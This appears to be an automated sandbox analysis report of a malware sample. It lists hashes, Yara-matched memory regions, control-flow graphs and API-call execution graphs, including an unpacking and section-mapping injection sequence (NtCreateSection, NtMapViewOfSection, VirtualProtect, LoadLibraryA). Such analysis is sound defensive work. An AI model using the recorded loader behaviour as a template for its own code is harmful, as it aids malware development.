                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                        • Instruction ID: f7568a5a22988f4b084f7ac8228f9b89e575eda69d31bfffabc36cd9cbe45c64
                                        • Opcode Fuzzy Hash: 0dfbee2e4a1c62836b2bd3ba6284fddb5b43d5507a7098400a51ac80bc720613
                                        • Instruction Fuzzy Hash: BDF0C2B6208144F7DB019AA18DB1FBA36299B44314F300233BA17B90F5C67C8612E76F
                                        APIs
                                        • Sleep.KERNELBASE(00001388), ref: 00401966
                                          • Part of subcall function 00401538: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015F5
                                          • Part of subcall function 00401538: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401622
                                          • Part of subcall function 00401538: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401645
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2181083909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                        Similarity
                                        • API ID: Section$CreateDuplicateObjectSleepView
                                        • String ID:
                                        • API String ID: 1885482327-0
                                        • Opcode ID: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                        • Instruction ID: 9d6088553fbd849a34ffa1589a5f9bffd683413c7e042594889390f4c4f3f426
                                        • Opcode Fuzzy Hash: f575feb9a37452ed4573e207967fb92b714552aa85f9b6ebf0a13cec3e485039
                                        • Instruction Fuzzy Hash: 08F0C2B2208144F7DB019A958DA0FBA36299B44314F300633B617B91F5C57C8A02E72F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_21d0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: .$GetProcAddress.$l
                                        • API String ID: 0-2784972518
                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                        • Instruction ID: 8fa6ff5e40234b0d48af797a21d580cf176a2f4d8853edfa434f4442e387748a
                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                        • Instruction Fuzzy Hash: 9A316AB6900609DFDB14CF99C880AAEBBF9FF48324F15404AD845A7310D7B1EA45CFA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2183129368.000000000229B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0229B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_229b000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                        • Instruction ID: bbe28a4394ab586a2143c4d92e92163aa5b15a9eaed650f292dae0d83f6b91f8
                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                        • Instruction Fuzzy Hash: 3B11C272350201AFD724CF95DC91EA673EAFB88330B198055ED08CB709D675E812CB60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2182772532.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_21d0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                        • Instruction ID: 8507db8a57e9bd242883e45178e9b010c50f3eb4a8ed2fc0f41f792afb711dc6
                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                        • Instruction Fuzzy Hash: 1401A276A50A14CFDF21CF24C814BAA33F5EB8A316F5944A9D90A97282E774A9418B90

                                        Execution Graph

                                        Execution Coverage:9%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:28
                                        Total number of Limit Nodes:2
                                        execution_graph 1383 224003c 1384 2240049 1383->1384 1396 2240e0f SetErrorMode SetErrorMode 1384->1396 1389 2240265 1390 22402ce VirtualProtect 1389->1390 1392 224030b 1390->1392 1391 2240439 VirtualFree 1395 22404be LoadLibraryA 1391->1395 1392->1391 1394 22408c7 1395->1394 1397 2240223 1396->1397 1398 2240d90 1397->1398 1399 2240dad 1398->1399 1400 2240dbb GetPEB 1399->1400 1401 2240238 VirtualAlloc 1399->1401 1400->1401 1401->1389 1402 2151a2c 1403 2151a3b 1402->1403 1406 21521cc 1403->1406 1408 21521e7 1406->1408 1407 21521f0 CreateToolhelp32Snapshot 1407->1408 1409 215220c Module32First 1407->1409 1408->1407 1408->1409 1410 215221b 1409->1410 1412 2151a44 1409->1412 1413 2151e8b 1410->1413 1414 2151eb6 1413->1414 1415 2151ec7 VirtualAlloc 1414->1415 1416 2151eff 1414->1416 1415->1416 1416->1416 1417 224092b GetPEB 1418 2240972 1417->1418

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 224003c-2240047 1 224004c-2240263 call 2240a3f call 2240e0f call 2240d90 VirtualAlloc 0->1 2 2240049 0->2 17 2240265-2240289 call 2240a69 1->17 18 224028b-2240292 1->18 2->1 23 22402ce-22403c2 VirtualProtect call 2240cce call 2240ce7 17->23 20 22402a1-22402b0 18->20 22 22402b2-22402cc 20->22 20->23 22->20 29 22403d1-22403e0 23->29 30 22403e2-2240437 call 2240ce7 29->30 31 2240439-22404b8 VirtualFree 29->31 30->29 33 22405f4-22405fe 31->33 34 22404be-22404cd 31->34 37 2240604-224060d 33->37 38 224077f-2240789 33->38 36 22404d3-22404dd 34->36 36->33 40 22404e3-2240505 36->40 37->38 43 2240613-2240637 37->43 41 22407a6-22407b0 38->41 42 224078b-22407a3 38->42 52 2240517-2240520 40->52 53 2240507-2240515 40->53 44 22407b6-22407cb 41->44 45 224086e-22408be LoadLibraryA 41->45 42->41 46 224063e-2240648 43->46 48 22407d2-22407d5 44->48 51 22408c7-22408f9 45->51 46->38 49 224064e-224065a 46->49 54 2240824-2240833 48->54 55 22407d7-22407e0 48->55 49->38 50 2240660-224066a 49->50 56 224067a-2240689 50->56 58 2240902-224091d 51->58 59 22408fb-2240901 51->59 60 2240526-2240547 52->60 53->60 57 2240839-224083c 54->57 61 22407e4-2240822 55->61 62 22407e2 55->62 63 2240750-224077a 56->63 64 224068f-22406b2 56->64 57->45 65 224083e-2240847 57->65 59->58 66 224054d-2240550 60->66 61->48 62->54 63->46 69 22406b4-22406ed 64->69 70 22406ef-22406fc 64->70 71 2240849 65->71 72 224084b-224086c 65->72 67 2240556-224056b 66->67 68 22405e0-22405ef 66->68 74 224056d 67->74 75 224056f-224057a 67->75 68->36 69->70 76 22406fe-2240748 70->76 77 224074b 70->77 71->45 72->57 74->68 78 224057c-2240599 75->78 79 224059b-22405bb 75->79 76->77 77->56 84 22405bd-22405db 78->84 79->84 84->66
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0224024D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2417110423.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_2240000_wjshsfa.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID: cess$kernel32.dll
                                        • API String ID: 4275171209-1230238691
                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction ID: 4af49dc1097356e632b0ba7ba54f92b73fc02ddab49efb284a84d0357cf7f545
                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                        • Instruction Fuzzy Hash: D5527B74A11229DFDB68CF98C984BACBBB1BF09304F1480D9E54DAB355DB30AA85DF14

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 85 21521cc-21521e5 86 21521e7-21521e9 85->86 87 21521f0-21521fc CreateToolhelp32Snapshot 86->87 88 21521eb 86->88 89 215220c-2152219 Module32First 87->89 90 21521fe-2152204 87->90 88->87 91 2152222-215222a 89->91 92 215221b-215221c call 2151e8b 89->92 90->89 95 2152206-215220a 90->95 96 2152221 92->96 95->86 95->89 96->91
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021521F4
                                        • Module32First.KERNEL32(00000000,00000224), ref: 02152214
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2417051568.000000000214B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0214B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_214b000_wjshsfa.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3833638111-0
                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction ID: fbe398ad1bd53db3bd5e16f9589385b3bf963c7b435441af9f52e5162c108e77
                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                        • Instruction Fuzzy Hash: 5EF06237140721AFD7202BB5AC8CB6B76E9AF49625F1006A8EE66910C0DB74E8454A61

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 98 2240e0f-2240e24 SetErrorMode * 2 99 2240e26 98->99 100 2240e2b-2240e2c 98->100 99->100
                                        APIs
                                        • SetErrorMode.KERNELBASE(00000400,?,?,02240223,?,?), ref: 02240E19
                                        • SetErrorMode.KERNELBASE(00000000,?,?,02240223,?,?), ref: 02240E1E
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2417110423.0000000002240000.00000040.00001000.00020000.00000000.sdmp, Offset: 02240000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_2240000_wjshsfa.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction ID: 6101b777299bb5550370ac940f085d6906adc7034c19501afa3e0b0c422ab8e2
                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                        • Instruction Fuzzy Hash: 98D0123125512877D7002AD4DC09BCD7B1CDF09B66F008011FB0DDD080CB70964046E5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 101 2151e8b-2151ec5 call 215219e 104 2151ec7-2151efa VirtualAlloc call 2151f18 101->104 105 2151f13 101->105 107 2151eff-2151f11 104->107 105->105 107->105
                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02151EDC
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2417051568.000000000214B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0214B000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_214b000_wjshsfa.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction ID: a26e17f49fcd8c1a19eb938f9f3b6cf2f3039042dce4e328d03a9852c248d9e1
                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                        • Instruction Fuzzy Hash: D6113C79A40208FFDB01DF98C985E99BBF5AF08351F058095F9589B361D371EA50DF90

                                        Execution Graph

                                        Execution Coverage:12.8%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.6%
                                        Total number of Nodes:1523
                                        Total number of Limit Nodes:37
                                        execution_graph 4170 402fc0 4171 401446 18 API calls 4170->4171 4172 402fc7 4171->4172 4173 403017 4172->4173 4174 40300a 4172->4174 4177 401a13 4172->4177 4175 406805 18 API calls 4173->4175 4176 401446 18 API calls 4174->4176 4175->4177 4176->4177 4178 4023c1 4179 40145c 18 API calls 4178->4179 4180 4023c8 4179->4180 4183 40726a 4180->4183 4186 406ed2 CreateFileW 4183->4186 4187 406f04 4186->4187 4188 406f1e ReadFile 4186->4188 4189 4062a3 11 API calls 4187->4189 4190 4023d6 4188->4190 4193 406f84 4188->4193 4189->4190 4191 4071e3 CloseHandle 4191->4190 4192 406f9b ReadFile lstrcpynA lstrcmpA 4192->4193 4194 406fe2 SetFilePointer ReadFile 4192->4194 4193->4190 4193->4191 4193->4192 4197 406fdd 4193->4197 4194->4191 4195 4070a8 ReadFile 4194->4195 4196 407138 4195->4196 4196->4195 4196->4197 4198 40715f SetFilePointer GlobalAlloc ReadFile 4196->4198 4197->4191 4199 4071a3 4198->4199 4200 4071bf lstrcpynW GlobalFree 4198->4200 4199->4199 4199->4200 4200->4191 4201 401cc3 4202 40145c 18 API calls 4201->4202 4203 401cca lstrlenW 4202->4203 4204 4030dc 4203->4204 4205 4030e3 4204->4205 4207 405f51 wsprintfW 4204->4207 4207->4205 4222 401c46 4223 40145c 18 API calls 4222->4223 4224 401c4c 4223->4224 4225 4062a3 11 API calls 4224->4225 4226 401c59 4225->4226 4227 406c9b 81 API calls 4226->4227 4228 401c64 4227->4228 4229 403049 4230 401446 18 API calls 4229->4230 4233 403050 4230->4233 4231 406805 18 API calls 4232 401a13 4231->4232 4233->4231 4233->4232 4234 40204a 4235 401446 18 API calls 4234->4235 4236 402051 IsWindow 4235->4236 4237 4018d3 4236->4237 4238 40324c 4239 403277 4238->4239 4240 40325e SetTimer 4238->4240 4241 4032cc 4239->4241 4242 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4239->4242 4240->4239 4242->4241 4243 4048cc 4244 4048f1 4243->4244 4245 4048da 4243->4245 4247 4048ff IsWindowVisible 4244->4247 4251 404916 4244->4251 4246 4048e0 4245->4246 4261 40495a 4245->4261 4248 403daf SendMessageW 4246->4248 4250 40490c 4247->4250 4247->4261 4252 4048ea 4248->4252 4249 404960 CallWindowProcW 4249->4252 4262 40484e SendMessageW 4250->4262 4251->4249 4267 406009 lstrcpynW 4251->4267 4255 404945 4268 405f51 wsprintfW 4255->4268 4257 40494c 4258 40141d 80 API calls 4257->4258 4259 404953 4258->4259 4269 406009 lstrcpynW 4259->4269 4261->4249 4263 404871 GetMessagePos ScreenToClient SendMessageW 4262->4263 4264 4048ab SendMessageW 4262->4264 4265 4048a3 4263->4265 4266 4048a8 4263->4266 4264->4265 4265->4251 4266->4264 4267->4255 4268->4257 4269->4261 4270 4022cc 4271 40145c 18 API calls 4270->4271 4272 4022d3 4271->4272 4273 4062d5 2 API calls 4272->4273 4274 4022d9 4273->4274 4275 4022e8 4274->4275 4279 405f51 wsprintfW 4274->4279 4278 4030e3 4275->4278 4280 405f51 wsprintfW 4275->4280 4279->4275 4280->4278 4281 4050cd 4282 405295 4281->4282 4283 4050ee GetDlgItem GetDlgItem GetDlgItem 4281->4283 4284 4052c6 4282->4284 4285 40529e GetDlgItem CreateThread CloseHandle 4282->4285 4330 403d98 SendMessageW 4283->4330 4287 4052f4 4284->4287 4289 4052e0 ShowWindow ShowWindow 4284->4289 4290 405316 4284->4290 4285->4284 4291 405352 4287->4291 4293 405305 4287->4293 4294 40532b ShowWindow 4287->4294 4288 405162 4301 406805 18 API calls 4288->4301 4335 403d98 SendMessageW 4289->4335 4339 403dca 4290->4339 4291->4290 4296 40535d SendMessageW 4291->4296 4336 403d18 4293->4336 4299 40534b 4294->4299 4300 40533d 4294->4300 4298 40528e 4296->4298 4303 405376 CreatePopupMenu 4296->4303 4302 403d18 SendMessageW 4299->4302 4304 404f72 25 API calls 4300->4304 4305 405181 4301->4305 4302->4291 4306 406805 18 API calls 4303->4306 4304->4299 4307 4062a3 11 API calls 4305->4307 4309 405386 AppendMenuW 4306->4309 4308 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4307->4308 4310 4051f3 4308->4310 4311 4051d7 SendMessageW SendMessageW 4308->4311 4312 405399 GetWindowRect 4309->4312 4313 4053ac 4309->4313 4314 405206 4310->4314 4315 4051f8 SendMessageW 4310->4315 4311->4310 4316 4053b3 TrackPopupMenu 4312->4316 4313->4316 4331 403d3f 4314->4331 4315->4314 4316->4298 4318 4053d1 4316->4318 4320 4053ed SendMessageW 4318->4320 4319 405216 4321 405253 GetDlgItem SendMessageW 4319->4321 4322 40521f ShowWindow 4319->4322 4320->4320 4323 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4320->4323 4321->4298 4326 405276 SendMessageW SendMessageW 4321->4326 4324 405242 4322->4324 4325 405235 ShowWindow 4322->4325 4327 40542f SendMessageW 4323->4327 4334 403d98 SendMessageW 4324->4334 4325->4324 4326->4298 4327->4327 4328 40545a GlobalUnlock SetClipboardData CloseClipboard 4327->4328 4328->4298 4330->4288 4332 406805 18 API calls 4331->4332 4333 403d4a SetDlgItemTextW 4332->4333 4333->4319 4334->4321 4335->4287 4337 403d25 SendMessageW 4336->4337 4338 403d1f 4336->4338 4337->4290 4338->4337 4340 403ddf GetWindowLongW 4339->4340 4350 403e68 4339->4350 4341 403df0 4340->4341 4340->4350 4342 403e02 4341->4342 4343 403dff GetSysColor 4341->4343 4344 403e12 SetBkMode 4342->4344 4345 403e08 SetTextColor 4342->4345 4343->4342 4346 403e30 4344->4346 4347 403e2a GetSysColor 4344->4347 4345->4344 4348 403e41 4346->4348 4349 403e37 SetBkColor 4346->4349 4347->4346 4348->4350 4351 403e54 DeleteObject 4348->4351 4352 403e5b CreateBrushIndirect 4348->4352 4349->4348 4350->4298 4351->4352 4352->4350 4353 4030cf 4354 40145c 18 API calls 4353->4354 4355 4030d6 4354->4355 4357 4030dc 4355->4357 4360 4063ac GlobalAlloc lstrlenW 4355->4360 4358 4030e3 4357->4358 4387 405f51 wsprintfW 4357->4387 4361 4063e2 4360->4361 4362 406434 4360->4362 4363 40640f GetVersionExW 4361->4363 4388 40602b CharUpperW 4361->4388 4362->4357 4363->4362 4364 40643e 4363->4364 4365 406464 LoadLibraryA 4364->4365 4366 40644d 4364->4366 4365->4362 4369 406482 GetProcAddress GetProcAddress GetProcAddress 4365->4369 4366->4362 4368 406585 GlobalFree 4366->4368 4370 40659b LoadLibraryA 4368->4370 4371 4066dd FreeLibrary 4368->4371 4374 4064aa 4369->4374 4377 4065f5 4369->4377 4370->4362 4373 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4370->4373 4371->4362 4372 406651 FreeLibrary 4381 40662a 4372->4381 4373->4377 4375 4064ce FreeLibrary GlobalFree 4374->4375 4374->4377 4383 4064ea 4374->4383 4375->4362 4376 4066ea 4379 4066ef CloseHandle FreeLibrary 4376->4379 4377->4372 4377->4381 4378 4064fc lstrcpyW OpenProcess 4380 40654f CloseHandle CharUpperW lstrcmpW 4378->4380 4378->4383 4382 406704 CloseHandle 4379->4382 4380->4377 4380->4383 4381->4376 4384 406685 lstrcmpW 4381->4384 4385 4066b6 CloseHandle 4381->4385 4386 4066d4 CloseHandle 4381->4386 4382->4379 4383->4368 4383->4378 4383->4380 4384->4381 4384->4382 4385->4381 4386->4371 4387->4358 4388->4361 4389 407752 4393 407344 4389->4393 4390 407c6d 4391 4073c2 GlobalFree 4392 4073cb GlobalAlloc 4391->4392 4392->4390 4392->4393 4393->4390 4393->4391 4393->4392 4393->4393 4394 407443 GlobalAlloc 4393->4394 4395 40743a GlobalFree 4393->4395 4394->4390 4394->4393 4395->4394 4396 401dd3 4397 401446 18 API calls 4396->4397 4398 401dda 4397->4398 4399 401446 18 API calls 4398->4399 4400 4018d3 4399->4400 4408 402e55 4409 40145c 18 API calls 4408->4409 4410 402e63 4409->4410 4411 402e79 4410->4411 4412 40145c 18 API calls 4410->4412 4413 405e30 2 API calls 4411->4413 4412->4411 4414 402e7f 4413->4414 4438 405e50 GetFileAttributesW CreateFileW 4414->4438 4416 402e8c 4417 402f35 4416->4417 4418 402e98 GlobalAlloc 4416->4418 4421 4062a3 11 API calls 4417->4421 4419 402eb1 4418->4419 4420 402f2c CloseHandle 4418->4420 4439 403368 SetFilePointer 4419->4439 4420->4417 4423 402f45 4421->4423 4425 402f50 DeleteFileW 4423->4425 4426 402f63 4423->4426 4424 402eb7 4428 403336 ReadFile 4424->4428 4425->4426 4440 401435 4426->4440 4429 402ec0 GlobalAlloc 4428->4429 4430 402ed0 4429->4430 4431 402f04 WriteFile GlobalFree 4429->4431 4432 40337f 37 API calls 4430->4432 4433 40337f 37 API calls 4431->4433 4437 402edd 4432->4437 4434 402f29 4433->4434 4434->4420 4436 402efb GlobalFree 4436->4431 4437->4436 4438->4416 4439->4424 4441 404f72 25 API calls 4440->4441 4442 401443 4441->4442 4443 401cd5 4444 401446 18 API calls 4443->4444 4445 401cdd 4444->4445 4446 401446 18 API calls 4445->4446 4447 401ce8 4446->4447 4448 40145c 18 API calls 4447->4448 4449 401cf1 4448->4449 4450 401d07 lstrlenW 4449->4450 4451 401d43 4449->4451 4452 401d11 4450->4452 4452->4451 4456 406009 lstrcpynW 4452->4456 4454 401d2c 4454->4451 4455 401d39 lstrlenW 4454->4455 4455->4451 4456->4454 4457 403cd6 4458 403ce1 4457->4458 4459 403ce5 4458->4459 4460 403ce8 GlobalAlloc 4458->4460 4460->4459 4461 402cd7 4462 401446 18 API calls 4461->4462 4465 402c64 4462->4465 4463 402d99 4464 402d17 ReadFile 4464->4465 4465->4461 4465->4463 4465->4464 4466 402dd8 4467 402ddf 4466->4467 4468 4030e3 4466->4468 4469 402de5 FindClose 4467->4469 4469->4468 4470 401d5c 4471 40145c 18 API calls 4470->4471 4472 401d63 4471->4472 4473 40145c 18 API calls 4472->4473 4474 401d6c 4473->4474 4475 401d73 lstrcmpiW 4474->4475 4476 401d86 lstrcmpW 4474->4476 4477 401d79 4475->4477 4476->4477 4478 401c99 4476->4478 4477->4476 4477->4478 4108 407c5f 4109 407344 4108->4109 4110 4073c2 GlobalFree 4109->4110 4111 4073cb GlobalAlloc 4109->4111 4112 407c6d 4109->4112 4113 407443 GlobalAlloc 4109->4113 4114 40743a GlobalFree 4109->4114 4110->4111 4111->4109 4111->4112 4113->4109 4113->4112 4114->4113 4479 404363 4480 404373 4479->4480 4481 40439c 4479->4481 4483 403d3f 19 API calls 4480->4483 4482 403dca 8 API calls 4481->4482 4484 4043a8 4482->4484 4485 404380 SetDlgItemTextW 4483->4485 4485->4481 4486 4027e3 4487 4027e9 4486->4487 4488 4027f2 4487->4488 4489 402836 4487->4489 4502 401553 4488->4502 4490 40145c 18 API calls 4489->4490 4492 40283d 4490->4492 4494 4062a3 11 API calls 4492->4494 4493 4027f9 4495 40145c 18 API calls 4493->4495 4500 401a13 4493->4500 4496 40284d 4494->4496 4497 40280a RegDeleteValueW 4495->4497 4506 40149d RegOpenKeyExW 4496->4506 4498 4062a3 11 API calls 4497->4498 4501 40282a RegCloseKey 4498->4501 4501->4500 4503 401563 4502->4503 4504 40145c 18 API calls 4503->4504 4505 401589 RegOpenKeyExW 4504->4505 4505->4493 4512 401515 4506->4512 4514 4014c9 4506->4514 4507 4014ef RegEnumKeyW 4508 401501 RegCloseKey 4507->4508 4507->4514 4509 4062fc 3 API calls 4508->4509 4511 401511 4509->4511 4510 401526 RegCloseKey 4510->4512 4511->4512 4515 401541 RegDeleteKeyW 4511->4515 4512->4500 4513 40149d 3 API calls 4513->4514 4514->4507 4514->4508 4514->4510 4514->4513 4515->4512 4516 403f64 4517 403f90 4516->4517 4518 403f74 4516->4518 4520 403fc3 4517->4520 4521 403f96 SHGetPathFromIDListW 4517->4521 4527 405c84 GetDlgItemTextW 4518->4527 4523 403fad SendMessageW 4521->4523 4524 403fa6 4521->4524 4522 403f81 SendMessageW 4522->4517 4523->4520 4525 40141d 80 API calls 4524->4525 4525->4523 4527->4522 4528 402ae4 4529 402aeb 4528->4529 4530 4030e3 4528->4530 4531 402af2 CloseHandle 4529->4531 4531->4530 4532 402065 4533 401446 18 API calls 4532->4533 4534 40206d 4533->4534 4535 401446 18 API calls 4534->4535 4536 402076 GetDlgItem 4535->4536 4537 4030dc 4536->4537 4538 4030e3 4537->4538 4540 405f51 wsprintfW 4537->4540 4540->4538 4541 402665 4542 40145c 18 API calls 4541->4542 4543 40266b 4542->4543 4544 40145c 18 API calls 4543->4544 4545 402674 4544->4545 4546 40145c 18 API calls 4545->4546 4547 40267d 4546->4547 4548 4062a3 11 API calls 4547->4548 4549 40268c 4548->4549 4550 4062d5 2 API calls 4549->4550 4551 402695 4550->4551 4552 4026a6 lstrlenW lstrlenW 4551->4552 4553 404f72 25 API calls 4551->4553 4556 4030e3 4551->4556 4554 404f72 25 API calls 4552->4554 4553->4551 4555 4026e8 SHFileOperationW 4554->4555 4555->4551 4555->4556 4564 401c69 4565 40145c 18 API calls 4564->4565 4566 401c70 4565->4566 4567 4062a3 11 API calls 4566->4567 4568 401c80 4567->4568 4569 405ca0 MessageBoxIndirectW 4568->4569 4570 401a13 4569->4570 4578 402f6e 4579 402f72 4578->4579 4580 402fae 4578->4580 4581 4062a3 11 API calls 4579->4581 4582 40145c 18 API calls 4580->4582 4583 402f7d 4581->4583 4588 402f9d 4582->4588 4584 4062a3 11 API calls 4583->4584 4585 402f90 4584->4585 4586 402fa2 4585->4586 4587 402f98 4585->4587 4590 4060e7 9 API calls 4586->4590 4589 403e74 5 API calls 4587->4589 4589->4588 4590->4588 4591 4023f0 4592 402403 4591->4592 4593 4024da 4591->4593 4594 40145c 18 API calls 4592->4594 4595 404f72 25 API calls 4593->4595 4596 40240a 4594->4596 4601 4024f1 4595->4601 4597 40145c 18 API calls 4596->4597 4598 402413 4597->4598 4599 402429 LoadLibraryExW 4598->4599 4600 40241b GetModuleHandleW 4598->4600 4602 40243e 4599->4602 4603 4024ce 4599->4603 4600->4599 4600->4602 4615 406365 GlobalAlloc WideCharToMultiByte 4602->4615 4604 404f72 25 API calls 4603->4604 4604->4593 4606 402449 4607 40248c 4606->4607 4608 40244f 4606->4608 4609 404f72 25 API calls 4607->4609 4611 401435 25 API calls 4608->4611 4613 40245f 4608->4613 4610 402496 4609->4610 4612 4062a3 11 API calls 4610->4612 4611->4613 4612->4613 4613->4601 4614 4024c0 FreeLibrary 4613->4614 4614->4601 4616 406390 GetProcAddress 4615->4616 4617 40639d GlobalFree 4615->4617 4616->4617 4617->4606 4618 402df3 4619 402dfa 4618->4619 4621 4019ec 4618->4621 4620 402e07 FindNextFileW 4619->4620 4620->4621 4622 402e16 4620->4622 4624 406009 lstrcpynW 4622->4624 4624->4621 4625 402175 4626 401446 18 API calls 4625->4626 4627 40217c 4626->4627 4628 401446 18 API calls 4627->4628 4629 402186 4628->4629 4630 4062a3 11 API calls 4629->4630 4634 402197 4629->4634 4630->4634 4631 4021aa EnableWindow 4633 4030e3 4631->4633 4632 40219f ShowWindow 4632->4633 4634->4631 4634->4632 4642 404077 4643 404081 4642->4643 4644 404084 lstrcpynW lstrlenW 4642->4644 4643->4644 4645 405479 4646 405491 4645->4646 4647 4055cd 4645->4647 4646->4647 4648 40549d 4646->4648 4649 40561e 4647->4649 4650 4055de GetDlgItem GetDlgItem 4647->4650 4651 4054a8 SetWindowPos 4648->4651 4652 4054bb 4648->4652 4654 405678 4649->4654 4662 40139d 80 API calls 4649->4662 4653 403d3f 19 API calls 4650->4653 4651->4652 4656 4054c0 ShowWindow 4652->4656 4657 4054d8 4652->4657 4658 405608 SetClassLongW 4653->4658 4655 403daf SendMessageW 4654->4655 4675 4055c8 4654->4675 4684 40568a 4655->4684 4656->4657 4659 4054e0 DestroyWindow 4657->4659 4660 4054fa 4657->4660 4661 40141d 80 API calls 4658->4661 4712 4058dc 4659->4712 4663 405510 4660->4663 4664 4054ff SetWindowLongW 4660->4664 4661->4649 4665 405650 4662->4665 4668 405587 4663->4668 4669 40551c GetDlgItem 4663->4669 4664->4675 4665->4654 4670 405654 SendMessageW 4665->4670 4666 40141d 80 API calls 4666->4684 4667 4058de DestroyWindow EndDialog 4667->4712 4671 403dca 8 API calls 4668->4671 4673 40554c 4669->4673 4674 40552f SendMessageW IsWindowEnabled 4669->4674 4670->4675 4671->4675 4672 40590d ShowWindow 4672->4675 4677 405559 4673->4677 4678 4055a0 SendMessageW 4673->4678 4679 40556c 4673->4679 4687 405551 4673->4687 4674->4673 4674->4675 4676 406805 18 API calls 4676->4684 4677->4678 4677->4687 4678->4668 4682 405574 4679->4682 4683 405589 4679->4683 4680 403d18 SendMessageW 4680->4668 4681 403d3f 19 API calls 4681->4684 4685 40141d 80 API calls 4682->4685 4686 40141d 80 API calls 4683->4686 4684->4666 4684->4667 4684->4675 4684->4676 4684->4681 4688 403d3f 19 API calls 4684->4688 4703 40581e DestroyWindow 4684->4703 4685->4687 